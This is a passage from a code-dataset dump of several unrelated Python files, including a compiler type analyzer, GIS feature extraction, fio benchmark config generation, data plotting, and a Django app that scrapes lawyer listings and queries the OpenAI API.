    @readonly\n    def visit_VarsMember(self, node, *, type=None):\n        # If join(iter, Set<Tuple<Bottom, ..., Bottom>>) ==\n        #     Set<Tuple<T1, ..., Tn>>, n == len(vars):\n        #     vars_i := T_i for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check iter <= Set<Tuple<Top, ..., Top>>\n
        n = len(node.vars)\n        t_iter = self.visit(node.iter)\n        t_target = self.get_sequence_elt(node, t_iter, Set)\n        t_vars = self.get_tuple_elts(node, t_target, n)\n        for v, t in zip(node.vars, t_vars):\n            self.update_store(v, t)\n    \n
    @readonly\n    def visit_SetFromMapMember(self, node, *, type=None):\n        # If join(rel, Set<Bottom>) ==\n        #      Set<Tuple<T1, ..., Tn>> and\n        #    join(map, Map<Tuple<Bottom, ..., Bottom>, Bottom>) ==\n        #      Map<Tuple<U1, ..., Un-1>, Un>, n == len(vars):\n        #     vars_i := join(T_i, U_i) for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check map <= Map<Tuple<Top, ..., Top>, Bottom>\n        # Check rel <= Set<Tuple<Top, ..., Top>>\n
        n = len(node.vars)\n        t_rel = self.get_store(node.rel)\n        t_relelt = self.get_sequence_elt(node, t_rel, Set)\n        t_relvars = self.get_tuple_elts(node, t_relelt, n)\n        t_map = self.get_store(node.map)\n        t_key, t_value = self.get_map_keyval(node, t_map)\n        t_keyvars = self.get_tuple_elts(node, t_key, n - 1)\n        t_mapvars = list(t_keyvars) + [t_value]\n        for v, t, u in zip(node.vars, t_relvars, t_mapvars):\n            self.update_store(v, t.join(u))\n    \n
    # Object domain clauses not implemented:\n    #   MMember\n    #   FMember\n    #   MAPMember\n    #   TUPMember\n    \n
    @readonly\n    def visit_Cond(self, node, *, type=None):\n        self.visit(node.cond)\n    \n
    def aggrop_helper(self, node, op, t_elt):\n        # If op is count or op is sum:\n        #     Check t_elt <= Number\n        #     Return Number\n        # Elif op is min or op is max:\n        #     Return t_elt\n
        if isinstance(node.op, (L.Count, L.Sum)):\n            if not t_elt.issmaller(Number):\n                self.mark_bad(node)\n                return Top\n            return Number\n        elif isinstance(node.op, (L.Min, L.Max)):\n            return t_elt\n        else:\n            assert()\n    \n
    @readonly\n    def visit_Aggr(self, node, *, type=None):\n        # If join(value, Set<Bottom>) == Set<T>:\n        #     Return aggrop_helper(op, T)\n        # Else:\n        #     Return Top\n        # Check value <= Set<Top>\n
        t_value = self.visit(node.value)\n        t_elt = self.get_sequence_elt(node, t_value, Set)\n        return self.aggrop_helper(node, node.op, t_elt)\n    \n
    @readonly\n    def visit_AggrRestr(self, node, *, type=None):\n        # As for Aggr, except we have the additional condition:\n        #\n        # Check restr <= Set<Tuple<Top, ..., Top>> of arity |params|\n
        t_value = self.visit(node.value)\n        t_elt = self.get_sequence_elt(node, t_value, Set)\n        t = self.aggrop_helper(node, node.op, t_elt)\n        \n        n = len(node.params)\n        t_restr = self.visit(node.restr)\n        if not 
t_restr.issmaller(Set(Tuple([Top] * n))):\n            self.mark_bad(node)\n        \n        return t\n    \n
    # Remaining nodes require no handler.\n\n\n
def analyze_types(tree, store, fixed_vars=None):\n    \"\"\"Given a mapping from variable identifiers to types, return a\n    modified version of the store that expands types according to the\n    requirements of the program. Also return an OrderedSet of nodes\n    where well-typedness is violated. Each type may only increase, not\n    decrease. Variables not appearing in the store mapping are assumed\n    to be Bottom.\n    \"\"\"\n
    store = dict(store)\n    \n    height_limit = 5\n    limit = 20\n    steps = 0\n    analyzer = TypeAnalysisStepper(store, height_limit, unknown=Bottom,\n                                   fixed_vars=fixed_vars)\n    while analyzer.changed:\n        if steps == limit:\n            print('Warning: Type analysis did not converge after '\n                  '{} steps'.format(limit))\n            break\n        store = analyzer.process(tree)\n        steps += 1\n    \n    return store, analyzer.illtyped\n\n\n
def analyze_expr_type(tree, store):\n    \"\"\"Given an expression node, return its type evaluation under the\n    given type store.\n    \"\"\"\n    store = dict(store)\n    height_limit = 5\n    \n
    # Bypass TypeAnalysisStepper's process() method since it discards\n    # type info. The given tree should not be a statement node.\n    class Analyzer(TypeAnalysisStepper):\n        process = L.AdvNodeVisitor.process\n    \n    type = Analyzer.run(tree, store, height_limit, unknown=Top)\n    return type\n","repo_name":"jaz888/dist_lang_reviews","sub_path":"incoq/compiler/type/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":28626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28222906495","text":"from geoalchemy2 import WKTElement\nfrom sqlalchemy import func, literal, Sequence\n\nfrom data_models.common_db import session, engine\nfrom data_models.grid_model import *\nfrom data_models.osm_model import *\nfrom data_models.geo_feature_model import *\nfrom utils import create_table\n\n\n
def crop_osm(osm_table, bounding_box):\n\n    # Use .isnot(None) so the NULL test is built into the SQL query; the\n    # original wrote `osm_table.fclass is not None`, a Python identity\n    # check on the column object that always evaluates True, so no\n    # IS NOT NULL filter ever reached the database.\n
    if bounding_box is not None:\n        return session.query(osm_table.wkb_geometry, osm_table.fclass) \\\n            .filter(func.ST_Intersects(osm_table.wkb_geometry, bounding_box)) \\\n            .filter(osm_table.fclass.isnot(None)).subquery()\n    else:\n        return session.query(osm_table.wkb_geometry, osm_table.fclass) \\\n            .filter(osm_table.fclass.isnot(None)).subquery()\n\n\n
def compute_features_from_osm(config):\n\n    osm_tables = config['OSM']\n    bounding_box = WKTElement(config['BOUNDING_BOX'], srid=4326)\n    grid_obj = config['GRID_OBJ']\n    geo_feature_obj = config['GEO_FEATURE_OBJ']\n\n    try:\n        for feature_name, osm_table in 
osm_tables.items():\n geo_feature_type = osm_table.wkb_geometry.type.geometry_type\n cropped_osm = crop_osm(osm_table, bounding_box) # crop the OSM data with a bounding box\n\n sub_query = session.query(grid_obj.gid, cropped_osm.c.fclass,\n func.ST_GeogFromWKB(\n func.ST_Intersection(grid_obj.geom, cropped_osm.c.wkb_geometry))\n .label('intersection')) \\\n .filter(func.ST_Intersects(grid_obj.geom, cropped_osm.c.wkb_geometry)).subquery()\n\n results = []\n if geo_feature_type == 'MULTIPOLYGON':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.SUM(func.ST_AREA(sub_query.c.intersection)).label('value'),\n literal('area').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n elif geo_feature_type == 'MULTILINESTRING':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.SUM(func.ST_LENGTH(sub_query.c.intersection)).label('value'),\n literal('length').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n elif geo_feature_type == 'POINT':\n results = session.query(sub_query.c.gid.label('gid'),\n sub_query.c.fclass.label('feature_type'),\n literal(feature_name).label('geo_feature'),\n func.COUNT(sub_query.c.intersection).label('value'),\n literal('count').label('measurement')) \\\n .group_by(sub_query.c.gid, sub_query.c.fclass).all()\n\n else:\n pass\n\n obj_results = []\n for res in results:\n obj_results.append(geo_feature_obj(gid=res[0], feature_type=res[1], geo_feature=res[2],\n value=res[3], measurement=res[4]))\n # session.add_all(obj_results)\n # session.commit()\n print('{} has finished'.format(feature_name))\n\n return\n\n except Exception as e:\n print(e)\n exit(-1)\n\n\nif __name__ == '__main__':\n\n LOS_ANGELES = {\n 'AREA': 'los_angeles',\n 'OSM': {\n 'landuse_a': CaliforniaOsmLanduseA,\n 'natural': CaliforniaOsmNatural,\n 'natural_a': CaliforniaOsmNaturalA,\n 'places': CaliforniaOsmPlaces,\n 'places_a': CaliforniaOsmPlacesA,\n 'pois': CaliforniaOsmPois,\n 'pois_a': CaliforniaOsmPoisA,\n 'pofw': CaliforniaOsmPofw,\n 'pofw_a': CaliforniaOsmPofwA,\n 'railways': CaliforniaOsmRailways,\n 'roads': CaliforniaOsmRoads,\n 'traffic': CaliforniaOsmTraffic,\n 'traffic_a': CaliforniaOsmTrafficA,\n 'transport': CaliforniaOsmTransport,\n 'transport_a': CaliforniaOsmTransportA,\n 'water_a': CaliforniaOsmWaterA,\n 'waterways': CaliforniaOsmWaterway\n },\n 'BOUNDING_BOX': 'POLYGON((-118.5246 33.7322, -118.5246 34.1455, -118.1158 34.1455, -118.1158 33.7322, '\n '-118.5246 33.7322))',\n 500: {\n 'GRID_OBJ': LosAngeles500mGrid,\n 'GEO_FEATURE_OBJ': LosAngeles500mGridGeoFeature,\n },\n 1000: {\n 'GRID_OBJ': LosAngeles1000mGrid,\n 'GEO_FEATURE_OBJ': LosAngeles1000mGridGeoFeature,\n }\n }\n\n target = LOS_ANGELES\n conf = target[1000]\n conf['OSM'] = target['OSM']\n conf['BOUNDING_BOX'] = target['BOUNDING_BOX']\n\n \"\"\" !!! 
Be careful, create table would overwrite the original table \"\"\"\n    # create_table(conf['GEO_FEATURE_OBJ'])\n    compute_features_from_osm(conf)\n","repo_name":"linyijun/prisms-data-preprocessing","sub_path":"gen_geo_features.py","file_name":"gen_geo_features.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"8794510620","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(formatter={'float': '{: 0.3f}'.format},linewidth=10000)\n\n
mnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0 #floats\ny_train, y_test = tf.keras.utils.to_categorical(y_train), tf.keras.utils.to_categorical(y_test)\n\n
classifier = tf.keras.models.load_model(\"classifier.h5\")\ndrawer = tf.keras.models.load_model(\"drawer.h5\")\n\ndrawer_x_train = classifier.predict(x_train)\ndrawer_x_test = classifier.predict(x_test)\n\n
i=10\nprediction = drawer.predict(np.array([[0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1]]))\nplt.imshow(prediction[0],cmap=\"gray_r\")\nplt.show()\n# plt.imshow(x_test[i],cmap=\"gray_r\")\n# plt.show()\n","repo_name":"Eviper01/DeepLearning","sub_path":"mnist_draw/model.test.py","file_name":"model.test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71614431615","text":"numbers = (1, 2, 3, 4, 5)\n\n\n# print(numbers, sep=';')\n# print(*numbers, sep=';')\n# print(1, 2, 3, 4, 5, sep=';')\n\n\ndef test_stars(*args):\n    print(args)\n    for x in args:\n        print(x)\n\n\ntest_stars(0, 1, 2, 3, 4, 5)\n\nprint()\n\ntest_stars()\n\n","repo_name":"deskavaenkelt/EcUtbildningDevOps","sub_path":"Linux and Script Languages/Python/Self Studies/FunctionsIntro/star_examples.py","file_name":"star_examples.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3079882595","text":"# Author:houyafan\nimport os, sys, json,time\n\n
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nfrom core.modifyDeposit.modifyDeposit import *\nfrom core.data.CONST import BASE_PATH, DATA_PATH\nfrom core.tools.check import *\nfrom core.tools.public_file import *\n\n
# Repay money owed on the credit card\n@public\ndef returnPrice():\n    returnMoney = input(\"请输入还款金额:\")\n    new_returnMoney = check_int(returnMoney)\n    with open(DATA_PATH + \"card_message_tmp.json\", \"r+\") as f:\n        data = json.load(f)\n        username=get_username()\n
        creditmax = data[username][\"message\"][\"CreditMax\"]  # remaining credit limit\n        original = data[username][\"message\"][\"Original\"]  # total credit limit\n        balance = data[username][\"message\"][\"Balance\"]  # account balance\n        owed = original - creditmax  # amount owed\n
        if creditmax == original:  # nothing owed: add straight to the balance\n            data[username][\"message\"][\"Balance\"] = balance+new_returnMoney\n            write_file(f, data)  # persist the repayment\n            write_return_bill(new_returnMoney)  # record the bill entry\n
        elif new_returnMoney == owed:  # repayment exactly equals the debt\n            data[username][\"message\"][\"CreditMax\"] = original\n            write_file(f, data)\n            write_return_bill(new_returnMoney)  # record the bill entry\n
        elif new_returnMoney > owed:  # repayment exceeds the debt\n            data[username][\"message\"][\"CreditMax\"] = original\n            data[username][\"message\"][\"Balance\"] = balance + new_returnMoney - owed\n            write_file(f, data)\n            write_return_bill(new_returnMoney)  # record the bill entry\n
        elif new_returnMoney < owed:  # repayment is less than the debt\n            if balance + new_returnMoney > owed:  # balance + repayment > debt\n                data[username][\"message\"][\"CreditMax\"] = original\n                data[username][\"message\"][\"Balance\"] = balance + new_returnMoney - owed\n                write_file(f, data)\n                write_return_bill(new_returnMoney)  # record the bill entry\n
            elif balance + new_returnMoney < owed:  # balance + repayment < debt\n                data[username][\"message\"][\"Balance\"] = 0\n                data[username][\"message\"][\"CreditMax\"] = original - owed + balance + new_returnMoney\n                write_file(f, data)\n                write_return_bill(new_returnMoney)  # record the bill entry\n
            elif balance + new_returnMoney == owed:  # balance + repayment == debt\n                data[username][\"message\"][\"Balance\"] = 0\n                data[username][\"message\"][\"CreditMax\"] = original\n                write_file(f, data)\n                write_return_bill(new_returnMoney)  # record the bill entry\n
            elif balance == 0:  # no balance left\n                data[username][\"message\"][\"CreditMax\"] = new_returnMoney\n                write_file(f, data)\n                write_return_bill(new_returnMoney)  # record the bill entry\n\n\n
# Append the repayment to the bill log\ndef write_return_bill(new_returnMoney):\n    with open(DATA_PATH+'bill.json', 'a+') as f:\n        f.seek(0)\n        data=json.load(f)\n        new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n        info='''%s 还款 %s 元''' % (new_time,new_returnMoney)\n        public_write(f, info, data)\n\n\n\n","repo_name":"huamingao/homework","sub_path":"day4/ATM优秀作业/stu170141/day_4_homework/Atm/core/returnDeposit/returnPrice.py","file_name":"returnPrice.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38696222443","text":"from tkinter import messagebox\nimport pandas as pd\nfrom police_stop_search.fetch_request import return_stop_and_search_cases\nfrom utils.get_month_as_dict import months_of_the_year\nimport numpy as np\nfrom chart_functions import horizontal_lollipop_chart, bar_chart_, scattered_plot, pie_chart, donut_chart\n \n\n
def get_stop_search_cases(selected_month, selected_year, selected_police_force):\n    date = selected_year + \"-\" + months_of_the_year()[selected_month]\n    # this function returns a dictionary with a length of two\n    result = return_stop_and_search_cases(selected_police_force, date)[\"data\"]\n    if result == []:\n        return messagebox.showinfo(\"showinfo\", \"There is no data for this month selected\")\n    else: \n        return result\n    \n
def plot_self_defined_ethnicity(selected_month, selected_year, police_force_selected):\n    df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, police_force_selected))\n    outcome = df.groupby(['self_defined_ethnicity'], as_index=False).count()\n    graph_title = \"Stop and search cases of self defined ethnicity for \" + police_force_selected + \" in \" + selected_month + \", \" + selected_year\n    bar_chart_(graph_title, outcome, outcome[\"involved_person\"], outcome[\"self_defined_ethnicity\"] )\n\n
def plot_legislation_outcome(selected_month, selected_year, selected_police_force):\n    df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, selected_police_force))\n    outcome = df.groupby(['legislation'], as_index=False).count()\n    title = \"Stop and search cases by legislation \\n for \" + selected_police_force + \" in \" + selected_month + \", \" + selected_year\n
    if len(outcome[\"involved_person\"]) == 3:\n        colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\"])\n    elif len(outcome[\"involved_person\"]) == 4:  # was a duplicate == 3 test; this branch holds four colours\n        colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\", \"#E6CCB2\"])\n    elif len(outcome[\"involved_person\"]) == 5:\n        colors = np.array([\"#94D2BD\",\"gold\", \"#FFB703\", \"#E6CCB2\", \"#9B2226\"])\n    else:  # previously missing, which left colors unbound for any other count\n        colors = np.array([\"#94D2BD\"] * len(outcome[\"involved_person\"]))\n    \n    scattered_plot(title, outcome[\"legislation\"], outcome[\"involved_person\"], 
colors)\n \ndef plot_stop_and_search_by_type(selected_month, selected_year, police_force_selected):\n df = pd.DataFrame.from_dict(get_stop_search_cases(selected_month, selected_year, police_force_selected))\n outcome = df.groupby([\"type\"], as_index=False)[[\"involved_person\"]].count()\n chart_title = \"Stop and Search Cases Breakdown by Ethnicity \\nfor \" + police_force_selected + \" in \" + selected_month + \", \" + selected_year\n pie_chart(chart_title, outcome[\"involved_person\"], outcome[\"type\"])\n \n \ndef plot_stop_search_by_age_range_resulting_in_arrest(Month, Year, SelectedPoliceForce):\n df = pd.DataFrame.from_dict(get_stop_search_cases(Month, Year, SelectedPoliceForce))\n df = df.loc[df['outcome'] == \"Arrest\"]\n df = df.reset_index()\n outcome = df.groupby([\"age_range\"], as_index=False)[[\"involved_person\"]].count()\n title = \"Stop and search cases by age range that resulted in arrest for \\n \" + SelectedPoliceForce + \" in \" + Month + \", \" + Year\n maximum_value=outcome.max()\n # determine the max value in the data\n maximum = maximum_value['involved_person'] \n \n horizontal_lollipop_chart(outcome.index, outcome[\"involved_person\"], outcome[\"age_range\"], maximum, graph_title=title, data=outcome)\n ","repo_name":"victorodoh/information-request-tool","sub_path":"police_stop_search/functions_for_form.py","file_name":"functions_for_form.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5645429745","text":"from collections import deque\ndef getSubArrCount(arr, k):\n length = len(arr)\n count = 0\n for i in range(length-1):\n for j in range(i+1, length):\n tempArr = arr[i:j+1]\n # print(tempArr)\n max, min = getMaxMin(tempArr)\n if max-min > k:\n count += 1\n print(count)\n\n\ndef getMaxMin(arr):\n length = len(arr)\n # subArr = []\n max = arr[0]\n min = arr[0]\n for i in range(1,length):\n if arr[i] > max:\n max = arr[i]\n if arr[i] < min:\n min = arr[i]\n return max, min\n\n# def subArrDeque(arr, k ):\n# count = 0\n# length = len(arr)\n# qmax = deque()\n# qmin = deque()\n# for i in range(length):\n# for j in range(0, length):\n# print(str(i)+\"->\"+str(j))\n# while qmax and arr[qmax[-1]] < arr[j]:\n# qmax.pop()\n# while qmin and arr[qmin[-1]] > arr[j]:\n# qmin.pop()\n# qmax.append(j)\n# qmin.append(j)\n# if arr[qmax[0]] - arr[qmin[0]] <= k:\n# break\n# if i == qmax[0]:\n# qmax.popleft()\n# if i == qmin[0]:\n# qmin.popleft()\n# count += j - i\n# print(count)\n\n\nif __name__ == '__main__':\n # arr = [int(x) for x in input().split(\" \")]\n # k = int(input())\n arr = [3, 6, 4, 3, 2]\n k = 2\n # subArrDeque(arr,k)\n getSubArrCount(arr, k)\n\n # print(getMaxMin(arr))\n\n","repo_name":"TcMysunshine/AdvanceAlgorithms","sub_path":"PythonAA/First/subArr.py","file_name":"subArr.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1920465702","text":"#!/usr/bin/env python3\n\nimport cpupol\nimport os\n\nmethods = [\"read\", \"write\"]\n\nCUR_DIR = os.path.abspath(os.path.dirname(__file__))\nODINFS_DIR = os.path.join(CUR_DIR, \"config_odinfs\")\nDELEGATION_THREADS=12\n\ndef get_ncores():\n\n ncores = []\n for socket in range(1, cpupol.PHYSICAL_CHIPS + 1):\n if socket == 1:\n n = 0\n while (2 ** n) < cpupol.CORE_PER_CHIP:\n ncores.append((2 ** n))\n n += 1\n ncores.append(socket * (cpupol.CORE_PER_CHIP))\n else:\n ncores.append(socket * (cpupol.CORE_PER_CHIP))\n\n 
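# the counts above are appended per socket (powers of two within the
    # first socket, then whole-socket totals), so sort into an ascending series
    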
ncores.sort()\n    return ncores\n\n
def gen_odinfs_cpus_allowed():\n    ret=\"cpus_allowed=\"\n    for i in range(1, cpupol.PHYSICAL_CHIPS + 1):\n        start = cpupol.CORE_PER_CHIP * (i - 1) + DELEGATION_THREADS \n        end = cpupol.CORE_PER_CHIP * i - 1\n
        # leave one CPU for pmwatch on the last socket (the original\n        # compared i against PHYSICAL_CHIPS + 1, a value the range above\n        # never produces, so the reservation never took effect)\n        if i == cpupol.PHYSICAL_CHIPS:\n            end -= 1\n\n
        if i != 1:\n            ret +=','\n        ret += '%d-%d' % (start, end)\n    return (ret + \"\\n\")\n    \n\n
def gen_config_py(ncores, odinfs):\n    tcore = cpupol.PHYSICAL_CHIPS * cpupol.CORE_PER_CHIP\n\n    for i in ncores: \n        for j in methods:\n            file_path = \"config-2m-%s-%s.fio\" % (j[0], i) \n            if odinfs:\n                file_path = os.path.join(ODINFS_DIR, file_path)\n            \n
            f = open(file_path, \"w\")\n            f.write(\"[global]\\n\")\n            f.write(\"include common.fio\\n\\n\")\n            f.write(\"[seq-%s-2m]\\n\" % j)\n            if odinfs:\n                f.write(gen_odinfs_cpus_allowed())\n            else:\n
                # leave one CPU for pmwatch: allow 0..tcore-2 (the original\n                # wrote tcore - 1, which handed out every core)\n                f.write(\"cpus_allowed=0-%d\\n\" % (tcore - 2))\n\n
            f.write(\"numjobs=%d\\n\" % i)\n            f.write(\"rw=%s\\n\" % j)\n            f.write(\"stonewall\\n\")\n            f.close()\n\n\n
if __name__ == \"__main__\":\n\n    ncores = get_ncores()\n\n    cores_str = 'cores=(' \n    for i in ncores:\n        cores_str += str(i) \n        if i != ncores[-1]:\n            cores_str += ' '\n\n    cores_str += ')'\n\n    \n
    f = open(\"common.sh\", \"w\")\n    f.write('sudo -v\\n')\n    f.write(cores_str)\n    f.close()\n\n    gen_config_py(ncores, False)\n    gen_config_py(ncores, True)\n\n    \n\n\n    \n\n","repo_name":"rs3lab/Odinfs","sub_path":"eval/ampl/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"72670788734","text":"from django.shortcuts import render,HttpResponse\nfrom .models import *\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport os,sys\nimport subprocess\nimport threading,time\nimport base64\nfrom django.contrib.auth.decorators import login_required\nfrom audioop import reverse\nfrom cmath import log\nimport email\nimport time\nfrom re import template\nimport re\nfrom datetime import datetime\nfrom unittest import loader\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.contrib.auth import authenticate,logout,login\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date,datetime\nfrom django.db import IntegrityError\nfrom django.utils import timezone\nfrom django.db.models import Q\nimport requests\nfrom bs4 import BeautifulSoup\nimport openai\nfrom django.db.models import Subquery\nfrom django.core.mail import send_mail\nfrom django.utils.crypto import get_random_string\nfrom smarthack.settings import EMAIL_HOST_USER\n\n# from your_app.models import UserProfilePhoto\n\n\n
def get_gpt3_response(user_message):\n\n    # SECURITY: the original hard-coded what appears to be a live OpenAI\n    # secret key here; read it from the environment instead of shipping\n    # the credential in source\n    api_key = os.environ.get('OPENAI_API_KEY')\n    \n\n    # # print(api_key)\n    openai.api_key = api_key\n
    # Create a conversation prompt\n    conversation_history = [\n        {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n        {\"role\": \"user\", \"content\": user_message}\n    ]\n\n
    # Convert conversation history to GPT-3.5 input format\n    prompt = \"\\n\".join(f\"{item['role']}: {item['content']}\" for item in conversation_history)\n\n
    # Get GPT-3.5 response\n    response = openai.Completion.create(\n        engine=\"text-davinci-002\",  # GPT-3.5 engine\n        prompt=prompt,\n        max_tokens=150  # Adjust as 
needed\n )\n\n gpt3_response = response.choices[0].text.strip()\n return gpt3_response\n\n# Example usage\n\ndef fn(request):\n #str=\"Choose from Given options what type of lawyer i need.and option are \"\n str = \"Reply in one word from given options what type of lawyer i need and options are \"\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n cnt=0\n sz=len(list1)\n for l1 in list1:\n str +=l1\n str +=\" ,\"\n\n # str +=\"I need reply in one word and exact same to given option with hyphen.\" \n return str\n\ndef lawerexactmatch(request):\n list1=[]\n list1.append(\"arbitration\")\n list1.append(\"anticipatory\")\n list1.append(\"banking\")\n list1.append(\"bankruptcy\")\n list1.append(\"breach\")\n list1.append(\"civil\")\n list1.append(\"corporate\")\n list1.append(\"family\")\n list1.append(\"criminal\")\n list1.append(\"cyber\")\n list1.append(\"domestic\")\n list1.append(\"divorce\")\n list1.append(\"muslim\")\n list1.append(\"wills\")\n list1.append(\"copyright\")\n list1.append(\"court\")\n list1.append(\"domestic\")\n list1.append(\"gst\")\n list1.append(\"immigration\")\n list1.append(\"labour\")\n list1.append(\"media\")\n list1.append(\"medical\")\n return list1\ndef lawerecatagoryexactmatch(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n return list1\n\n\n\n\n\n\n# Create your views here.\ndef storedata(request):\n # return render(request,'navebar.html')\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n 
list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n\n cnt=0\n for l1 in list1:\n # URL of the page for the current advocate type\n url = f'https://lawrato.com/{l1}'\n cnt+=1\n \n # Send an HTTP GET request to the URL\n response = requests.get(url)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all the lawyer listings with the specified class\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n\n # Loop through all the lawyer listings for the current advocate type\n for lawyer in lawyer_listings:\n # Extract lawyer's name\n name = lawyer.find('h2', class_='media-heading').text.strip()\n\n # Extract lawyer's location\n location = lawyer.find('div', class_='location').text.strip()\n\n # Extract lawyer's experience\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n # areaskill=lawyer.find('div', class_='area-skill').text.strip()\n\n # Extract lawyer's contact link\n # contact_link = lawyer.find('a', title='CONTACT NOW')['href']\n\n # Extract lawyer's rating\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocate(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url\n )\n print(name)\n cat=Advocatecatagory(cat=l1)\n cat.save()\n advocate.save()\n\n # # print or store the extracted information for each lawyer\n # print(f\"Type: {l1}\")\n # print(f\"Name: {name}\")\n # print(f\"Location: {location}\")\n # print(f\"Experience: {experience}\")\n # # print(f\"Contact Link: {contact_link}\")\n # print(f\"Rating: {rating}\")\n # print()\n else:\n print(f\"Failed to retrieve the page for {l1}. 
